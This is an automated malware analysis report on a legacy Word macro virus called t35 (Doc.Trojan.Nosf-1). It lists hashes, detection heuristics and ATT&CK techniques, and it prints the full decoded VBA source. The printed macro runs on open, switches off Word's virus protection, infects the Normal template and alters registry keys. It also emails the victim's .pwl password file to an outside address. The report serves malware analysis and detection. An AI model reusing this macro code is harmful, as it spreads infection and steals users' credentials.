Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c914cfa910bf3138…

MALICIOUS

Office (OLE)

45.5 KB Created: 2001-06-03 13:11:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 5c4f0e02f2e1d71de5a8df459881f4ef SHA-1: 0765e5d961c3534caa685109cef0232cb15b8b0f SHA-256: c914cfa910bf3138e617ea8375055433f5b5e563c423bb9e5b15b4e7db90875b
370 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a VBA macro with an AutoOpen subroutine that utilizes WScript.Shell and CreateObject to execute commands. The script attempts to export itself as 't35.dll' to the system directory and likely downloads and executes a second-stage payload, as indicated by the 'Ingress Tool Transfer' heuristic and the presence of URLs. The ClamAV detection 'Doc.Trojan.Nosf-1' further supports its malicious nature.

Heuristics 9

  • ClamAV: Doc.Trojan.Nosf-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Nosf-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    End With
Set ant = CreateObject("WScript.Shell")
Dim wer, dirsystem, dirwin
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    End With
Set ant = CreateObject("WScript.Shell")
Dim wer, dirsystem, dirwin
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    't35
Sub AutoOpen()
On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.ringo82.narod.ru/t35.html In document text (OLE body)
    • http://www.ringo82.narod.ru/t35/hello.htmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4672 bytes
SHA-256: b6c3b42b1d915828bc077a8bf03aca96cdbd09582cb5029eb042d0ed94f24e1f
Detection
ClamAV: Doc.Trojan.Nosf-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "t35"
't35
Sub AutoOpen()
On Error Resume Next
'==============+++++++====================================
'=                t35 prodused by Nosferatu              =
'= ____________________give me your time________________ =
'= +++++++++++++++++++++++++++++++++++++++++++++++++++++ =
'= Моя армия велика, мой голос громче других,я Nosferatu =
'=========================================================
DisableAutoMacros = 0
SetAttr NormalTemplate.Path + "\" + NormalTemplate, 0
With Application
.EnableCancelKey = True
.ScreenUpdating = False
.ShowVisualBasicEditor = False
End With
With Options
.ConfirmConversions = False
.SaveNormalPrompt = False
.VirusProtection = False
End With
Set ant = CreateObject("WScript.Shell")
Dim wer, dirsystem, dirwin
Set wer = CreateObject("Scripting.FileSystemObject")
Set dirwin = wer.GetSpecialFolder(0)
Set dirsystem = wer.GetSpecialFolder(1)
If Word.Application.MacroContainer = Word.Application.NormalTemplate Then
Set eto = Word.Application.ActiveDocument
Application.NormalTemplate.VBProject.VBComponents("t35").Export dirsystem + "\t35.dll"
GoTo don
End If
Set eto = Word.Application.NormalTemplate
Application.ActiveDocument.VBProject.VBComponents("t35").Export dirsystem + "\t35.dll"
don:
If eto.VBProject.VBComponents("t35").CodeModule.Lines(1, 1) <> "'t35" Then
Word.Application.Options.VirusProtection = vbEmpty
Word.Application.Options.SaveNormalPrompt = vbEmpty
eto.VBProject.VBComponents.Import dirsystem + "\t35.dll"
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
Kill dirsystem + "\t35.dll"
look35 = ant.RegRead("HKEY_LOCAL_MACHINE\Security\Network\t35")
If (look35 = "") Then
ant.RegWrite "HKEY_LOCAL_MACHINE\Security\Network\t35", Day(Now) & ":" & Month(Now)
ant.RegWrite "HKEY_LOCAL_MACHINE\Security\Network\counter35", 0
ant.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.ringo82.narod.ru/t35.html"
ant.RegWrite "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ComputerName\", "soldier"
ant.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization", "t35"
ant.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner", "Mephist0pHELL"
ant.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProductName", "base35"
uin = ant.RegRead("HKEY_LOCAL_MACHINE\Network\Logon\UserName")
file1 = dirwin + "\" + uin + ".pwl"
Set mybod = Date + "#" + Time + "#" + uin + "--- from t35 macros by Nosferatu" + "http://www.ringo82.narod.ru/t35/hello.html    -----DrWeb, thanks for idea...and for VBS.Dr.Troyan 2.1  -------  with best wishes. Nosferatu."
Set OutLook = WScript.CreateObject("Outlook.Application")
Set mo = OutLook.CreateItem(0)
mo.Recipients.Add ("ringo82@narod.ru")
mo.Recipients.Add ("drweb2k@chat.ru")
mo.Subject = "T35"
mo.Body = mybod
mo.Attachments.Add (file1)
mo.Send
End If
aaa = ant.RegRead("HKEY_LOCAL_MACHINE\Security\Network\counter35")
If aaa > 50 Then
ant.RegWrite "HKEY_LOCAL_MACHINE\Security\Network\t35", ""
End If
tcount = ant.RegRead("HKEY_LOCAL_MACHINE\Security\Network\counter35") + 1
ant.RegWrite "HKEY_LOCAL_MACHINE\Security\Network\counter35", tcount
End Sub
Sub FileTemplates()
On Error Resume Next
ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub
Sub ViewCode()
On Error Resume Next
ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub
Sub ViewVBCode()
On Error Resume Next
ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub
Sub ToolsMacro()
On Error Resume Next
ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub
'========================================================
'From Novy Urengoi (Russia) with love...
'MacroVir-t35 - симбиоз нескольких хороших идей.
'
'===========Greets to:===================================
'Dimka, MMX, MC Wizard, Zisem, Scorpy, Macro-vx-scene,
' thanks to DrWeb
'ТюмГУ, Городам: Новый Уренгой, Одесса, Москва, Тюмень.
'===========Fucks to:====================================
'                        ... всем, кто не верит в себя...
'========================================================
'                                               Nosferatu

Open this report in the interactive analyzer, or submit your own file for analysis.